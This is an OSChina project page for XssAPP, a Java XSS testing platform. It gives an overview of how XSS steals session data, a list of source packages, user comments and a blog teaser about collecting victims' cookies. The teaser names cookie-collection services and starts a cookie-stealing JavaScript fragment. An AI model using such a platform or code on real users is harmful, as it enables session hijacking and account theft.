XssAPP 正在参加 2020 年度 OSC 中国开源项目评选,请投票支持!
XssAPP 在 2020 年度 OSC 中国开源项目评选 中已获得 {{ projectVoteCount }} 票,请投票支持!
投票让它出道
已投票
XssAPP 获得 2020 年度 OSC 中国开源项目评选「最佳人气项目」 !
XssAPP 获得 2020 年度 OSC 中国开源项目评选「最佳人气项目」「最积极运营项目」 !
XssAPP 获得 2020 年度 OSC 中国开源项目评选「最积极运营项目」 !
授权协议 GPL
开发语言 Java HTML/CSS
操作系统 跨平台
软件类型 开源软件
所属分类 管理和监控安全相关
开发厂商
地区 国产
提 交 者 Coody
适用人群 未知
收录时间 2017-02-07

软件简介

XssAPP 是一个专业的 XSS 渗透测试平台。

平台简介

用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息。攻击者通常会用十六进制(或其他编码方式)将链接编码,以免用户怀疑它的合法性。网站在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面,而这个页面看起来就像是那个网站应当生成的合法页面一样。许多流行的留言本和论坛程序允许用户发表包含HTML和javascript的帖子。假设用户甲发表了一篇包含恶意脚本的帖子,那么用户乙在浏览这篇帖子时,恶意脚本就会执行,盗取用户乙的session信息。有关攻击方法的详细情况将在下面阐述。

项目源代码引导说明

1)        源代码结构截图

2)        Spring mvc配置

3)        数据源配置

4)        事物管理

5)        Quartz定时器配置

6)        AOP缓存实现

7)        后台权限拦截

源代码类说明

4.1.1.1  com.xss.web.util工具类集合

com.xss.web.util包

CommonUtils 公共util操作方法封装工具

Constants 系统枚举或常量存放点

DateUtils  日期操作工具

EmailSenderUtil 邮件发送工具

EncryptionUtil  密码加密工具

FileUtils 文件读写工具

HibernateConfigurationUtil  hibernate常用操作工具

HqlUtil  hql语句转换工具

HTMLSpirit  html操作工具

HttpUtil  http请求工具

IPager  分页工具,接口

JsonUtil  json测试工具

JSONWriter  json转化工具

JUUIDUtil uuid生成工具

MsgEntity  系统消息容器

PropresUtil 对象操作工具

ReqJsonUtil 基于Gson的json操作工具

RequestUtil  请求转化工具

SpringContextHelper  spring对象池获取工具

StringUtils  字符串操作工具

UploadUtil  文件上传工具

VerificationCodeUtil 验证码生成工具

4.1.1.2  com.xss.web.annotation 注解合集

CacheHandle  添加缓存注解

DelCacheHandle 删除缓存注解

UpdateCacheHandle 更新缓存注解,暂未使用

4.1.1.3  com.xss.web.aspect aop层

CacheAspect  基于AOP的缓存实现类

4.1.1.4  com.xss.web.base基础公用层

com.xss.web.base.cache 基础缓存实现

com.xss.web.base.dao  hibernate持久层

com.xss.web.base.page  分页对象实现

com.xss.web.base.thread系统公用线程池

com.xss.web.base.wrapper  xss跨站脚本防御容器

4.1.1.5  com.xss.web.cache  缓存层

com.xss.web.cache.base 基础缓存

AdminCache 后台用户类

EmailCache  发信邮箱操作类

InviteCache  邀请码操作类

LetterCache 信封管理类

MenuCache 后台菜单类

ModuleCache 模板类

ProjectCache 项目类

RoleCache 后台角色类

SettingCache  网站设置类

SuffixCache  网站后缀操作类

UserCache  用户类

4.1.1.6  com.xss.web.controllers controller层

com.xss.web.controllers.base公用controller父类

AdminController 后台管理操作类

Controller 前台首页与周边功能类

Scontroller  收信类

UserController  前台会员操作类

4.1.1.7  com.xss.web.entity 工具对象与系统对象类

HqlEntity  hql对象

HttpEntity   http对象

MsgEntity 系统消息机制容器

PropresEntity  反射常用对象

Record  map封装容器

SimpleConcurrentMap  map封装缓存容器

ThisWhere   hql where条件对象

Where   hql where条件对象

4.1.1.8  com.xss.web.filter  过滤器层

AdminFilter 后台管理过滤器,包含权限拦截,菜单加载等

BaseFilter 基础信息过滤器,包含项目基础地址加载

SuffixFilter 后缀过滤器,实现系统可控设置后缀或伪静态

UserFilter  用户过滤器,用户身份拦截

XssFilter  预防xss跨站脚本攻击对本系统造成的隐患

4.1.1.9  com.xss.web.model  系统实体对象 (hibernate生成)

4.1.1.10    com.xss.web.service  service层

4.1.1.11    com.xss.web.task 定时器

EmailInitTask  发信邮箱状态激活定时器

展开阅读全文

代码

的 Gitee 指数为
超过 的项目

评论 (3)

加载中
打分: 很差
开源完了又取消开源了?~~好神奇 @局长
2018/07/20 11:42
回复
举报
打分: 力荐
五星好评
2018/07/20 11:40
回复
举报
打分: 力荐
你写了这么多没用啊!本来我想下你的代码看一看,学习学习呢!点击下载源码,结果没有失望!不管你发源码了没有,就凭你写出这么多东西我个人觉得你肯定有源码,只是你没有分享而已!不管怎么说都要给你一个五星好评!
2018/07/20 11:38
回复
举报
更多评论
暂无内容
发表了博客
2016/11/04 11:59

网络安全之XSS

1.如果收到被害者的cookie. 其实可以在自己网站上做一个脚本来进行cookie收集。。。也可以用第三方的cookie收集平台。。 比如或者xss.la等。这两个平台都是禁止注册的。。自己写一个就好.很简单 熟悉javascript,简单看下别人偷cookie的代码。。就明白是怎么回事了 var x=new Image(); try { var myopener=''; myopener=w...

0
0
没有更多内容
加载失败,请刷新页面
点击加载更多
加载中
下一页
暂无内容
3 评论
8 收藏
分享
OSCHINA
登录后可查看更多优质内容
返回顶部
顶部